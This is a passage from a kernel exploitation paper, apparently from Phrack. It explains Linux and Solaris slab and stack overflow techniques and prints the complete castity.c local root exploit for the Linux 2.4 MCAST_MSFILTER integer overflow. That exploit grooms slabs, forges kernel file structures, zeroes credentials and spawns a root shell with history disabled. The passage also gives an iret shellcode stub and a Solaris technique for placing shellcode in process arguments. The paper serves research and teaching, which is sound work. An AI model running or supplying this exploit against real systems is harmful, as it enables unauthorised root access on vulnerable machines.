which, modulo 56, gives out exactly 16, which is the maxcolor value (the
color range is thus 0 - 16, which leads to three possible colorings with
an alignment of 8).

Based on the previous snippet of code, we know that the first allocation
had a coloring of 8 ( mincolor == 0 + align == 8 ), the second one of 16
(which is the value still recorded inside the kmem_cache_t).
If we were to exhaust this slab and get a new one, we would know for
sure that the coloring would be 0.

Linux uses a similar 'circular' coloring too; just look for where
'kmem_cache_t'->colour_next is set and incremented.

Neither operating system decrements the color value upon freeing of a
slab, so that has to be taken into account too (easy to do on Solaris,
since slab_create is the maximum number of slabs created).

---[ 2.2.2 - Slab overflow exploiting : MCAST_MSFILTER 

Given the technical basis to understand and exploit a slab overflow, it's
time for a practical example. 
We're presenting here an exploit for the MCAST_MSFILTER [4] vulnerability
found by iSEC people :

< linux-2.4.24/net/ipv4/ip_sockglue.c >

        struct sockaddr_in *psin;
        struct ip_msfilter *msf = 0;
        struct group_filter *gsf = 0;
        int msize, i, ifindex;

        if (optlen < GROUP_FILTER_SIZE(0))
                goto e_inval;
        gsf = (struct group_filter *)kmalloc(optlen,GFP_KERNEL); [2]
        if (gsf == 0) {
                err = -ENOBUFS;
                break;
        }
        err = -EFAULT;
        if (copy_from_user(gsf, optval, optlen)) {  [3]
                goto mc_msf_out;
        }
        if (GROUP_FILTER_SIZE(gsf->gf_numsrc) < optlen) { [4]
                err = EINVAL;
                goto mc_msf_out;
        }
        msize = IP_MSFILTER_SIZE(gsf->gf_numsrc);  [1]
        msf = (struct ip_msfilter *)kmalloc(msize,GFP_KERNEL); [7]
        if (msf == 0) {
                err = -ENOBUFS;
                goto mc_msf_out;
        }

        ...

        msf->imsf_multiaddr = psin->sin_addr.s_addr;
        msf->imsf_interface = 0;
        msf->imsf_fmode = gsf->gf_fmode;
        msf->imsf_numsrc = gsf->gf_numsrc;
        err = -EADDRNOTAVAIL;
        for (i=0; i<gsf->gf_numsrc; ++i) {  [5]
                psin = (struct sockaddr_in *)&gsf->gf_slist[i];

                if (psin->sin_family != AF_INET) [8]
                        goto mc_msf_out;
                msf->imsf_slist[i] = psin->sin_addr.s_addr; [6]
        }

        ...

mc_msf_out:
        if (msf)
                kfree(msf);
        if (gsf)
                kfree(gsf);

< / >

< linux-2.4.24/include/linux/in.h >

#define IP_MSFILTER_SIZE(numsrc) \    [1]
        (sizeof(struct ip_msfilter) - sizeof(__u32) \
        + (numsrc) * sizeof(__u32))


#define GROUP_FILTER_SIZE(numsrc) \   [4]
        (sizeof(struct group_filter) - sizeof(struct
__kernel_sockaddr_storage) \
        + (numsrc) * sizeof(struct __kernel_sockaddr_storage))

< / >

The vulnerability consists of an integer overflow at [1], since we
control the gsf struct, as you can see from [2] and [3].
The check at [4] proved to be, initially, a problem, which was resolved
thanks to the slab property of not cleaning objects on free (more on
that shortly).
The for loop at [5] is where we effectively do the overflow, by writing,
at [6], the 'psin->sin_addr.s_addr' passed inside the gsf struct over
the previously allocated msf struct [7] (kmalloc'ed with the badly
calculated 'msize' value).
This for loop is a godsend, because thanks to the check at [8] we are
able to avoid the classical problem with integer overflow derived bugs
(that is, writing _a lot_ past the buffer due to the usually huge value
used to trigger the overflow) and to exit cleanly through mc_msf_out.

As explained before, while describing the 'first exploitation approach',
we need to find some object/data that gets kmalloc'ed in the same slab
and which contains a pointer or some crucial value that would let us
change the execution flow.

We found a solution with the 'struct shmid_kernel' :

< linux-2.4.24/ipc/shm.c >

struct shmid_kernel /* private to the kernel */
{
        struct kern_ipc_perm    shm_perm;
        struct file *           shm_file;
        int                     id;
        ...
};

asmlinkage long sys_shmget (key_t key, size_t size, int shmflg)
{
        struct shmid_kernel *shp;
        int err, id = 0;
        ...
        if (key == IPC_PRIVATE) {
                err = newseg(key, shmflg, size);
        ...

static int newseg (key_t key, int shmflg, size_t size)
{
        ...
        shp = (struct shmid_kernel *) kmalloc (sizeof (*shp), GFP_USER);
        ...

< / >

As you can see, struct shmid_kernel is 64 bytes long and gets allocated
from the kmalloc size-64 generic cache [ we can alloc as many as we want
(up to filling the slab) using subsequent 'shmget' calls ].
Inside it there is a struct file pointer, which we could make point,
thanks to the overflow, to userland, where we will emulate all the
necessary structs to reach a function pointer dereference (that's
exactly what the exploit does).

Now it is time to force the msize value into being > 32 and <= 64, to
make it be allocated inside the same (size-64) generic cache.
'Good' values for gsf->gf_numsrc range from 0x40000005 to 0x4000000c.
That raises another problem : since we're able to write 4 bytes for
every __kernel_sockaddr_storage present in the gsf struct, we need a
pretty large one to reach the 'shm_file' pointer, and so we need to pass
a large 'optlen' value.
The 0x40000005 - 0x4000000c range, though, makes the GROUP_FILTER_SIZE()
macro used at [4] evaluate to a positive and small value, which isn't
large enough to reach the 'shm_file' pointer.

We solved that problem thanks to the fact that, once an object is freed,
its 'memory contents' are not zeroed (or cleaned in any way).
Since the copy_from_user at [3] happens _before_ the check at [4], we
were able to create a sequence of 1024-sized objects by repeatedly
issuing a failing (at [4]) 'setsockopt', thus obtaining a large-enough
one.

Hoping to make it clearer let's sum up the steps :        

  - fill the 1024-slabs so that at the next allocation a fresh one is
    returned
  - alloc the first object of the new 1024-slab.
  - use as many 'failing' setsockopts as needed to copy values inside
    objects 2 and 3 [and 4, if needed, though that is not the usual case]
  - free the first object
  - use a smaller (but still 1024-slab allocation driving) value for
    optlen that passes the check at [4]

At that point the gsf pointer points to the first object inside our
freshly created slab. Objects 2 and 3 haven't been re-used yet, so they
still contain our data. Since the objects inside the slab are adjacent,
we have a de-facto larger (and large enough) gsf struct to reach the
'shm_file' pointer.

Last note, to reliably fill the slabs we check /proc/slabinfo. 
The exploit, called castity.c, was written when the advisory went out, and
is only for 2.4.* kernels (the sys_epoll vulnerability [12] was more than 
enough for 2.6.* ones ;) )

The exploit follows, without the initial header, since the approach has
already been extensively explained above.
< stuff/expl/linux/castity.c >

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>

#define __u32           unsigned int
#define MCAST_MSFILTER  48
#define SOL_IP          0
#define SIZE            4096
#define R_FILE          "/etc/passwd"    // Set it to whatever file you
                                         // can read. It's just for 1024
                                         // filling.

struct in_addr {
   unsigned int   s_addr;
};

#define __SOCK_SIZE__   16

struct sockaddr_in {
  unsigned short        sin_family;     /* Address family               */
  unsigned short int    sin_port;       /* Port number                  */
  struct in_addr        sin_addr;       /* Internet address             */

  /* Pad to size of `struct sockaddr'. */
  unsigned char         __pad[__SOCK_SIZE__ - sizeof(short int) -
                        sizeof(unsigned short int) -
                        sizeof(struct in_addr)];
};

struct group_filter {
        __u32                   gf_interface;   /* interface index */
        struct sockaddr_storage gf_group;       /* multicast address */
        __u32                   gf_fmode;       /* filter mode */
        __u32                   gf_numsrc;      /* number of sources */
        struct sockaddr_storage gf_slist[1];    /* source list */
};

struct  damn_inode      {
        void            *a, *b;
        void            *c, *d;
        void            *e, *f;
        void            *i, *l;
        unsigned long   size[40];  // Yes, somewhere here :-)
} le;

struct  dentry_suck     {
        unsigned int    count, flags;
        void            *inode;
        void            *dd;
} fucking = { 0xbad, 0xbad, &le, NULL };

struct  fops_rox        {
        void            *a, *b, *c, *d, *e, *f, *g;
        void            *mmap;
        void            *h, *i, *l, *m, *n, *o, *p, *q, *r;
        void            *get_unmapped_area;
} chien;

struct  file_fuck       {
        void            *prev, *next;
        void            *dentry;
        void            *mnt;
        void            *fop;
} gagne = { NULL, NULL, &fucking, NULL, &chien };

static char     stack[16384];

int             gotsig = 0,
                fillup_1024 = 0,
                fillup_64 = 0,
                uid, gid;

int             *pid, *shmid;

static void sigusr(int b)
{
        gotsig = 1;
}

void fatal (char *str)
{
        fprintf(stderr, "[-] %s\n", str);
        exit(EXIT_FAILURE);
}

#define BUFSIZE 256

int calculate_slaboff(char *name)
{
        FILE *fp;
        char slab[BUFSIZE], line[BUFSIZE];
        int ret;
        /* UP case */
        int active_obj, total;

        bzero(slab, BUFSIZE);
        bzero(line, BUFSIZE);

        fp = fopen("/proc/slabinfo", "r");
        if ( fp == NULL )
                fatal("error opening /proc for slabinfo");

        fgets(slab, sizeof(slab) - 1, fp);
        do {
                ret = 0;
                if (!fgets(line, sizeof(line) - 1, fp))
                        break;
                ret = sscanf(line, "%s %u %u", slab, &active_obj, &total);
        } while (strcmp(slab, name));

        fclose(fp);

        return ret == 3 ? total - active_obj : -1;
}


int populate_1024_slab()
{
        int fd[252];
        int i;

        signal(SIGUSR1, sigusr);

        for ( i = 0; i < 252 ; i++)
                fd[i] = open(R_FILE, O_RDONLY);

        while (!gotsig)
                ;               /* wait for SIGUSR1 */
        gotsig = 0;

        for ( i = 0; i < 252; i++)
                close(fd[i]);

        return 0;
}


int kernel_code()
{
        int i, c;
        int *v;

        __asm__("movl   %%esp, %0" : : "m" (c));

        c &= 0xffffe000;
        v = (void *) c;

        for (i = 0; i < 4096 / sizeof(*v) - 1; i++) {
                if (v[i] == uid && v[i+1] == uid) {
                        i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
                        if (v[i] == gid) {
                                v[i++] = 0; v[i++] = 0;
                                v[i++] = 0; v[i++] = 0;
                                return -1;
                        }
                }
        }

        return -1;
}

void    prepare_evil_file ()
{
        int i = 0;

        chien.mmap = &kernel_code;    // just to pass do_mmap_pgoff check
        chien.get_unmapped_area = &kernel_code;

        /*
         * First time i run the exploit i was using a precise offset for
         * size, and i calculated it _wrong_. Since then my lazyness took
         * over and i use that ""very clean"" *g* approach.
         * Why i'm telling you ? It's 3 a.m., i don't find any better than
         * writing blubbish comments
         */

        for ( i = 0; i < 40; i++)
                le.size[i] = SIZE;
}


#define SEQ_MULTIPLIER  32768

void    prepare_evil_gf ( struct group_filter *gf, int id )
{
        int                     filling_space = 64 - 4 * sizeof(int);
        int                     i = 0;
        struct sockaddr_in      *sin;

        filling_space /= 4;

        for ( i = 0; i < filling_space; i++ ) {
              sin = (struct sockaddr_in *)&gf->gf_slist[i];
              sin->sin_family = AF_INET;
              sin->sin_addr.s_addr = 0x41414141;
        }

        /* Emulation of struct kern_ipc_perm */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = IPC_PRIVATE;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = uid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = gid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = uid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = gid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = -1;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = id/SEQ_MULTIPLIER;

        /* evil struct file address */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = (unsigned long)&gagne;

        /* that will stop mcast loop */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = 0xbad;
        sin->sin_addr.s_addr = 0xdeadbeef;
}



void    cleanup ()
{
        int                     i = 0;
        struct shmid_ds         s;

        for ( i = 0; i < fillup_1024; i++ ) {
                kill(pid[i], SIGUSR1);
                waitpid(pid[i], NULL, __WCLONE);
        }

        for ( i = 0; i < fillup_64 - 2; i++ )
                shmctl(shmid[i], IPC_RMID, &s);
}


#define EVIL_GAP        4
#define SLAB_1024       "size-1024"
#define SLAB_64         "size-64"
#define OVF             21
#define CHUNKS          1024
#define LOOP_VAL        0x4000000f
#define CHIEN_VAL       0x4000000b

int main ()
{
        int                     sockfd, ret, i;
        unsigned int            true_alloc_size, last_alloc_chunk, loops;
        char                    *buffer;
        struct group_filter     *gf;
        struct shmid_ds         s;

        char    *argv[] = { "le-chien", NULL };
        char    *envp[] = { "TERM=linux", "PS1=le-chien\\$",
"BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null",
"HISTFILE=/dev/null", NULL };

        true_alloc_size = sizeof(struct group_filter) - sizeof(struct
sockaddr_storage) + sizeof(struct sockaddr_storage) * OVF;
        sockfd = socket(AF_INET, SOCK_STREAM, 0);

        uid = getuid();
        gid = getgid();

        gf = malloc (true_alloc_size);
        if ( gf == NULL )
                fatal("Malloc failure\n");

        gf->gf_interface = 0;
        gf->gf_group.ss_family = AF_INET;

        fillup_64 = calculate_slaboff(SLAB_64);

        if ( fillup_64 == -1 )
                fatal("Error calculating slab fillup\n");

        printf("[+] Slab %s fillup is %d\n", SLAB_64, fillup_64);

        /* Yes, two would be enough, but we have that "sexy" #define, why
don't use it ? :-) */

        fillup_64 += EVIL_GAP;

        shmid = malloc(fillup_64 * sizeof(int));
        if ( shmid == NULL )
                fatal("Malloc failure\n");

        /* Filling up the size-64 and obtaining a new page with EVIL_GAP
entries */

        for ( i = 0; i < fillup_64; i++ )
                shmid[i] = shmget(IPC_PRIVATE, 4096, IPC_CREAT|SHM_R);

        prepare_evil_gf(gf, shmid[fillup_64 - 1]);

        buffer = (char *)gf;

        fillup_1024 = calculate_slaboff(SLAB_1024);
        if ( fillup_1024 == -1 )
                fatal("Error calculating slab fillup\n");

        printf("[+] Slab %s fillup is %d\n", SLAB_1024, fillup_1024);

        fillup_1024 += EVIL_GAP;

        pid = malloc(fillup_1024 * sizeof(int));
        if (pid  == NULL )
                fatal("Malloc failure\n");

        for ( i = 0; i < fillup_1024; i++)
                pid[i] = clone(populate_1024_slab, stack + sizeof(stack) -
4, 0, NULL);

        printf("[+] Attempting to trash size-1024 slab\n");

        /* Here starts the loop trashing size-1024 slab */

        last_alloc_chunk = true_alloc_size % CHUNKS;
        loops = true_alloc_size / CHUNKS;

        gf->gf_numsrc = LOOP_VAL;

        printf("[+] Last size-1024 chunk is of size %d\n", last_alloc_chunk);
        printf("[+] Looping for %d chunks\n", loops);

        kill(pid[--fillup_1024], SIGUSR1);
        waitpid(pid[fillup_1024], NULL, __WCLONE);

        if ( last_alloc_chunk > 512  )
                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer +
loops * CHUNKS, last_alloc_chunk);
        else
                /*
                 * Should never happen. If it happens it probably means
                 * that we've bigger datatypes (or slab-size), so probably
                 * there's something more to "fix me". The while loop below
                 * is already okay for the eventual fixing ;)
                 */
                fatal("Last alloc chunk fix me\n");

        while ( loops > 1 ) {
                kill(pid[--fillup_1024], SIGUSR1);
                waitpid(pid[fillup_1024], NULL, __WCLONE);

                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer +
--loops * CHUNKS, CHUNKS);
        }

        /* Let the real fun begin */

        gf->gf_numsrc = CHIEN_VAL;

        kill(pid[--fillup_1024], SIGUSR1);
        waitpid(pid[fillup_1024], NULL, __WCLONE);

        shmctl(shmid[fillup_64 - 2], IPC_RMID, &s);
        setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer, CHUNKS);


        ret = (unsigned long)shmat(shmid[fillup_64 - 1], NULL, SHM_RDONLY);

        if ( ret == -1) {
                printf("Le Fucking Chien GAGNE!!!!!!!\n");
                setresuid(0, 0, 0);
                setresgid(0, 0, 0);
                execve("/bin/sh", argv, envp);
        }

        printf("Here we are, something sucked :/ (if not L1_cache too big, "
               "probably slab align, retry)\n");

        return 0;
}

< / > 

------[ 2.3 - Stack overflow vulnerabilities

When a process is in 'kernel mode' it has a stack which is different from
the stack it uses at userland. We'll call it the 'kernel stack'.
That kernel stack is usually limited in size to a couple of pages (on
Linux, for example, it is 2 pages, 8kb, but a compile time option exists
to limit it to one page) and it is no surprise that a common design
practice in kernel code development is to use as little local stack space
as possible inside each function.

At a first glance, we can imagine two different scenarios that could go
under the name of 'stack overflow vulnerabilities' :

 - 'standard' stack overflow vulnerability : a write past a buffer on the
   stack overwrites the saved instruction pointer or the frame pointer
   (Solaris only, Linux is compiled with -fomit-frame-pointer) or some
   variable (usually a pointer) also located in the stack. 

 - 'stack size overflow' : a deeply nested callgraph grows beyond the
   allocated stack space.

Stack based exploitation is more architecture and o.s. specific than the
slab based one just presented.
That is due to the fact that once the stack is trashed we achieve
execution flow hijack, but then we must find a way to somehow return to
userland. We won't cover here the details of the x86 architecture, since
those have already been very well explained by noir in his phrack60
paper [13].

We will instead focus on the UltraSPARC architecture and on its most
common operating system, Solaris. The next subsection will describe the
relevant details of it and will present a technique which is suitable
as well for exploiting slab based overflows (or, more generally,
whatever 'controlled flow redirection' vulnerability).

The AMD64 architecture won't be covered yet, since it will be our 'example
architecture' for the next kind of vulnerabilities (race condition). The
sendmsg [5] exploit proposed later on is, at the end, a stack based one.

Just before going on with the UltraSPARC section we'll spend a couple
of words describing the return-to-ring3 needs on an x86 architecture and
the Linux use of the kernel stack (since it quite differs from the
Solaris one).
Linux packs together the stack and the struct associated to every process
in the system (on Linux 2.4 it was directly the task_struct, on Linux 2.6
it is the thread_info one, which is way smaller and keeps inside a pointer
to the task_struct). This memory area is, by default, 8 Kb (a kernel
option exists to have it limited to 4 Kb), that is the size of two pages,
which are allocated consecutively with the first one aligned to a 2^13
multiple. The address of the thread_info (or of the task_struct) is thus
calculable at runtime by masking out the 13 least significant bits of the
Kernel Stack pointer (%esp).

The stack starts at the bottom of this area and 'grows' towards the top,
where the thread_info (or the task_struct) is located. To prevent the
'second' type of overflow when the 4 Kb Kernel Stack is selected at
compile time, the kernel uses two additional per-CPU stacks, one for
interrupt handling and one for softirq and tasklet functions, both one
page sized.

It is obviously on the stack that Linux stores all the information to
return from exceptions, interrupts or function calls and, logically, to 
get back to ring3, for example by means of the iret instruction. 
If we want to use the 'iret' instruction inside our shellcodes to get out
cleanly from kernel land we have to prepare a fake stack frame like the
one it expects to find.

We have to supply:
  - a valid user space stack pointer
  - a valid user space instruction pointer
  - a valid saved EFLAGS register
  - a valid User Code Segment
  - a valid User Stack Segment

 |                 |
 |   User SS       | -+
 |   User ESP      |  |
 |   EFLAGS        |  |  Fake Iret Frame
 |   User CS       |  |
 |   User EIP      | -+  <----- current kernel stack pointer (ESP)
 |                 |

We've added a demonstrative stack based exploit (for the Linux dummy
driver) which implements a shellcode using that recovery approach :

  movl   $0x7b,0x10(%esp)       // user stack segment (SS)
  movl   $stack_chunk,0xc(%esp) // user stack pointer (ESP)
  movl   $0x246,0x8(%esp)       // valid EFLAGS saved register
  movl   $0x73,0x4(%esp)        // user code segment (CS)
  movl   $code_chunk,0x0(%esp)  // user code pointer  (EIP)

You can find it in < expl/linux/stack_based.c > 

---[ 2.3.1 - UltraSPARC exploiting

The UltraSPARC [14] is a full implementation of the SPARC V9 64-bit [2]
architecture. The most 'interesting' part of it, from an exploiting
perspective, is the support it gives the operating system for a fully
separated address space between userspace and kernelspace.

This is achieved through the use of context registers and address space
identifiers (ASIs). The UltraSPARC MMU provides two settable context
registers, the primary (PContext) and the secondary (SContext) one. One
more context register, hardwired to zero, is provided : the nucleus
context ('context' 0 is where the kernel lives).
To every process address space a 'context value' is associated, which is
set inside the PContext register during process execution. This value is
used to perform memory address translation.

Every time a process issues a trap instruction to access kernel land (for
example ta 0x8 or ta 0x40, which is how system calls are implemented on
Solaris 10), the nucleus context is set as the default. The process context
value (as recorded inside PContext) is then moved to SContext, while the
nucleus context becomes the 'primary context'. 

At that point the kernel code can directly access userland by specifying
the correct ASI to a load or store alternate instruction (instructions
that support a directly specified ASI immediate - lda/sta).
Address Space Identifiers (ASIs) basically specify how those instructions
have to behave :

< usr/src/uts/sparc/v9/sys/asi.h >

#define ASI_N                   0x04    /* nucleus */
#define ASI_NL                  0x0C    /* nucleus little */
#define ASI_AIUP                0x10    /* as if user primary */
#define ASI_AIUS                0x11    /* as if user secondary */
#define ASI_AIUPL               0x18    /* as if user primary little */
#define ASI_AIUSL               0x19    /* as if user secondary little */


#define ASI_USER        ASI_AIUS

< / > 

These are the ASIs specified by the SPARC v9 reference (more ASIs are
machine dependent and let you modify, for example, the MMU or other
hardware registers, check usr/src/uts/sun4u/sys/machasi.h); the 'little'
versions are just used to specify a byte ordering different from the
'standard' big endian one (SPARC v9 can access data in both formats).

The ASI_USER is the one used to access, from kernel land, the user space. 
An instruction like :

       ldxa [addr]ASI_USER, %l1 

would just load the double word stored at 'addr', relative to the address
space context stored in the SContext register, 'as if' it was accessed by
userland code (so with all protection checks).

It is thus possible, once we are able to execute a minimal stub of code,
to copy bytes from userland wherever we want in kernel land.

But how do we execute code in the first place ? Or, to make it even
clearer, where do we return once we have performed our (slab/stack)
overflow and hijacked the instruction pointer ?

To complicate things a little more, the UltraSPARC architecture implements
the execution bit permission over TTEs (Translation Table Entry, which are
the TLB entries used to perform virtual/physical translations). 

It is time to take a look at the Solaris kernel implementation to find a
solution. The technique we're going to present now (as you'll quickly
figure out) is not limited to stack based exploiting, but can be used
every time you're able to redirect the instruction flow at kernel land
to an arbitrary address.

---] 2.3.2 - A reliable Solaris/UltraSPARC exploit

The Solaris process model is slightly different from the Linux one. The
fundamental unit of scheduling is the 'kernel thread' (described by the
kthread_t structure), so one has to be associated to every existing LWP
(light-weight process) in a process.
LWPs are just kernel objects which represent the 'kernel state' of every
'user thread' inside a process and thus let each one enter the kernel
independently (without LWPs, user threads would contend at system calls).

The information relative to a 'running process' is thus scattered among
different structures. Let's see what we can make out of them.
Every Operating System (and Solaris doesn't differ) has a way to quickly
get the 'current running process'. On Solaris it is the 'current kernel
thread' and it's obtained, on UltraSPARC, by :

#define curthread       (threadp())  

< usr/src/uts/sparc/ml/ >

! return current thread pointer

        .inline threadp,0
        .register %g7, #scratch
        mov     %g7, %o0
        .end

< / > 

It is thus stored inside the %g7 global register. 
From the kthread_t struct we can access all the other 'process related'
structs. Since our main purpose is to raise privileges we're interested in
where the Solaris kernel stores process credentials. 

Those are saved inside the cred_t structure pointed to by the proc_t one :

# mdb -k
Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
> ::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000e67488 snmpdx
> 0000030000e67488::print proc_t
    p_exec = 0x30000e5b5a8
    p_as = 0x300008bae48
    p_lockp = 0x300006167c0
    p_crlock = {
        _opaque = [ 0 ]
    p_cred = 0x3000026df28
> 0x3000026df28::print cred_t
    cr_ref = 0x67b
    cr_uid = 0
    cr_gid = 0
    cr_ruid = 0
    cr_rgid = 0
    cr_suid = 0
    cr_sgid = 0
    cr_ngroups = 0
    cr_groups = [ 0 ]
> ::offsetof proc_t p_cred
offsetof (proc_t, p_cred) = 0x20
> ::quit


The '::ps' dcmd output introduces a very interesting feature of the
Solaris Operating System, which is a godsend for exploiting.
The address of the proc_t structure in kernel land is exported to
userland :

bash-2.05$ ps -aef -o addr,comm | grep snmpdx
     30000e67488 /usr/lib/snmp/snmpdx

At a first glance that could seem of no great help, since, as we said,
the kthread_t struct keeps a pointer to the related proc_t one :

> ::offsetof kthread_t t_procp
offsetof (kthread_t, t_procp) = 0x118
> ::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000e67488 snmpdx
> 0000030000e67488::print proc_t p_tlist
p_tlist = 0x30000e52800
> 0x30000e52800::print kthread_t t_procp
t_procp = 0x30000e67488

To understand more precisely why the exported address is so important we
have to take a deeper look at the proc_t structure. 
This structure contains the user_t struct, which keeps information like
the program name, its argc/argv value, etc : 

> 0000030000e67488::print proc_t p_user
    p_user.u_ticks = 0x95c
    p_user.u_comm = [ "snmpdx" ]
    p_user.u_psargs = [ "/usr/lib/snmp/snmpdx -y -c /etc/snmp/conf" ]
    p_user.u_argc = 0x4
    p_user.u_argv = 0xffbffcfc
    p_user.u_envp = 0xffbffd10
    p_user.u_cdir = 0x3000063fd40

We can control many of those.
Even more important, the pages that contain the process_cache (and thus
the user_t struct) are not marked no-exec, so we can execute from there
(the kernel stack, for example, allocated from the seg_kp [kernel
pageable memory] segment, is not executable).

Let's see how 'u_psargs' is declared :

< usr/src/common/sys/user.h >
#define PSARGSZ         80      /* Space for exec arguments (used by
ps(1)) */
#define MAXCOMLEN       16      /* <= MAXNAMLEN, >= sizeof (ac_comm) */


typedef struct  user {
        /*
         * These fields are initialized at process creation time and never
         * modified.  They can be accessed without acquiring locks.
         */
        struct execsw *u_execsw;        /* pointer to exec switch entry */
        auxv_t  u_auxv[__KERN_NAUXV_IMPL]; /* aux vector from exec */
        timestruc_t u_start;            /* hrestime at process start */
        clock_t u_ticks;                /* lbolt at process start */
        char    u_comm[MAXCOMLEN + 1];  /* executable file name from exec */
        char    u_psargs[PSARGSZ];      /* arguments from exec */
        int     u_argc;                 /* value of argc passed to main() */
        uintptr_t u_argv;               /* value of argv passed to main() */
        uintptr_t u_envp;               /* value of envp passed to main() */

< / >

The idea is simple : we put our shellcode on the command line of our
exploit (without 'zeros') and we calculate the exact return address from
the exported proc_t address.
This is enough to exploit all those situations where we control the
execution flow _without_ trashing the stack (function pointer
overwriting, slab overflow, etc).

We have to remember to take care of the alignment, though, since the
UltraSPARC fetch unit raises an exception if the address it reads the
instruction from is not aligned on a 4 byte boundary (which is the size
of every sparc instruction) :

> ::offsetof proc_t p_user
offsetof (proc_t, p_user) = 0x330
> ::offsetof user_t u_psargs
offsetof (user_t, u_psargs) = 0x161

Since the proc_t taken from the 'process cache' is always aligned to an 8
byte boundary, we have to jump 3 bytes after the start of the u_psargs
char array (which is where we'll put our shellcode).
That means that we have space for 76 / 4 = 19 instructions, which is
usually enough for average shellcodes.. but space is not really a limit,
since we can 'chain' the psargs arrays of different processes, simply
jumping from one to the next. Moreover, we could write a two stage
shellcode that would just copy over a larger one from userland using the
load from alternate space instructions presented before.

We're now facing a slightly more complex scenario, though : the 'kernel
stack overflow'. We assume here that you're somehow familiar with
userland stack based exploiting (if you're not, you can check [15]).
The main problem here is that we have to find a way to safely return to
userland once the stack has been trashed (and so, to reach the
instruction pointer, the frame pointer). A good way to understand how
the 'kernel stack' is used to return to userland is to follow the path
of a system call.
You can get a quite good primer here [17], but we think a read through
the opensolaris sources is way better (you'll also see, following the
sys_trap entry in uts/sun4u/ml/mach_locore.s, the code setting the
nucleus context as the PContext register).

Let's focus on the 'kernel stack' usage : 

< usr/src/uts/sun4u/ml/mach_locore.s >

        ! user trap
        ! make all windows clean for kernel
        ! buy a window using the current thread's stack
        sethi   %hi(nwin_minus_one), %g5
        ld      [%g5 + %lo(nwin_minus_one)], %g5
        wrpr    %g0, %g5, %cleanwin
        CPU_ADDR(%g5, %g6)
        ldn     [%g5 + CPU_THREAD], %g5
        ldn     [%g5 + T_STACK], %g6
        sub     %g6, STACK_BIAS, %g6
        save    %g6, 0, %sp
< / > 

In %g5 is saved the number of windows implemented by the architecture
minus one, which is, in this case, 8 - 1 = 7.
CLEANWIN is set to that value since there are no windows in use apart
from the current one, and so the kernel has 7 free windows to use.

The cpu_t struct address is then saved in %g5 (by CPU_ADDR) and, from
there, the thread pointer [ cpu_t->cpu_thread ] is obtained.
From the kthread_t struct the 'kernel stack address' is obtained [the
member is called t_stk]. This is good news, since that member is easily
accessible from within a shellcode (it's just a matter of correctly
dereferencing the %g7 / thread pointer). From now on we can follow the
sys_trap path and figure out what we will find on the stack just after
the kthread_t->t_stk value, and where.

From that value 'STACK_BIAS' is then subtracted : the 64-bit v9 SPARC
ABI specifies that the %fp and %sp registers are offset by a constant,
the stack bias, which is 2047 bytes. This is one thing we have to
remember while writing our 'stack fixup' shellcode.
On 32-bit running kernels the value of this constant is 0.

The save below is another piece of good news, because it means that we
can use the t_stk value as a %fp (along with the 'right return address')
to return to 'some valid point' inside the syscall path (and thus let it
flow from there and cleanly get back to userspace).

The question now is : at which point ? Do we have to 'hardcode' that
return address or can we somehow gather it ?

A further look at the syscall path reveals that :

        mov     %l6, THREAD_REG
        wrpr    %g0, PSTATE_KERN, %pstate       ! enable ints
        jmpl    %l3, %o7                        ! call trap handler
        mov     %l7, %o0

And, that %l3 is : 

        SYSTRAP_TRACE(%o1, %o2, %o3)

        ! at this point we have a new window we can play in,
        ! and %g6 is the label we want done to bounce to
        ! save needed current globals
        mov     %g1, %l3        ! pc
        mov     %g2, %o1        ! arg #1
        mov     %g3, %o2        ! arg #2
        srlx    %g3, 32, %o3    ! pseudo arg #3
        srlx    %g2, 32, %o4    ! pseudo arg #4

%g1 was preserved since :

#define SYSCALL(which)                  \
        TT_TRACE(trace_gen)             ;\
        set     (which), %g1            ;\
        ba,pt   %xcc, sys_trap          ;\
        sub     %g0, 1, %g4             ;\
        .align  32

and so it is syscall_trap for LP64 syscalls and syscall_trap32 for ILP32
syscalls. Let's check if the stack layout is the one we expect to find :

> ::ps ! grep snmp
R    291      1    291    291     0 0x00020008 0000030000db4060 snmpXdmid
R    278      1    278    278     0 0x00010008 0000030000d2f488 snmpdx
> ::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000d2f488 snmpdx
> 0000030000d2f488::print proc_t p_tlist
p_tlist = 0x30001dd4800
> 0x30001dd4800::print kthread_t t_stk
t_stk = 0x2a100497af0 ""
> 0x2a100497af0,16/K
0x2a100497af0:  1007374         2a100497ba0     30001dd2048     1038a3c
                1449e10         0               30001dd4800
                2a100497ba0     ffbff700        3               3a980
                0               3a980           0
                ffbff6a0        ff1525f0        0               0
                0               0               0
> syscall_trap32=X
                1038a3c

Analyzing the 'stack frame' we see that the saved %l6 is exactly
THREAD_REG (the thread value, 30001dd4800) and %l3 is 1038a3c, the
syscall_trap32 address. 

